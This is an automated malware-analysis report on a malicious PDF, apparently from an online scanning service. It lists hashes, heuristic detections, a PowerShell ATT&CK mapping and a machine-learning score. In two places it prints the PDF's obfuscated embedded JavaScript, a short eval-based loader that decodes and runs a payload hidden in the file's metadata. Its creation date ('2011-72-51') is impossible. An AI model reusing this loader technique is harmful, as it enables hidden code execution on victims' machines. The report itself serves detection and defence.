PDF malware analysis — malicious · c9640b0e11ebca36

MALICIOUS

PDF

52.6 KB Created: 2011-72-51 03:25:00 First seen: 2026-05-09

MD5: c90e7b6b4fa2d0939d07616568ad0aa8 SHA-1: e43f777ed0fde8de550f0bae447bde2064aa2686 SHA-256: c9640b0e11ebca36b99f7427eb2006a2926b7d15e94580c03304ab656ae86907

116 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript stream, named 'javascript_obj0001_000.js', is obfuscated and likely responsible for executing a malicious payload. The document body contains fragments that resemble JavaScript code, further supporting the presence of scripting.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
function oil(f){return f}lit=oil(/**/this);
fg=1;bo=lit.creator;i=['b','a','k','e','u','a','g','v','l'];golo='replace';e=i[3]+i[7]+i[1]+i[8];a=(lit)[lit.info.gemna];j=(lit)[e];ax=(bo)[golo](/(67549013245)/g,a(String.fromCharCode(36+fg)));j(a(ax));
)
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0x9	249 bytes
SHA-256: `9226e61308d9ef17c7341db8fbcdcc9414145454096cd0e4e5f8861938869f92`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script function oil(f){return f}lit=oil(/**/this); fg=1;bo=lit.creator;i=['b','a','k','e','u','a','g','v','l'];golo='replace';e=i[3]+i[7]+i[1]+i[8];a=(lit)[lit.info.gemna];j=(lit)[e];ax=(bo)[golo](/(67549013245)/g,a(String.fromCharCode(36+fg)));j(a(ax));

Open this report in the interactive analyzer, or submit your own file for analysis.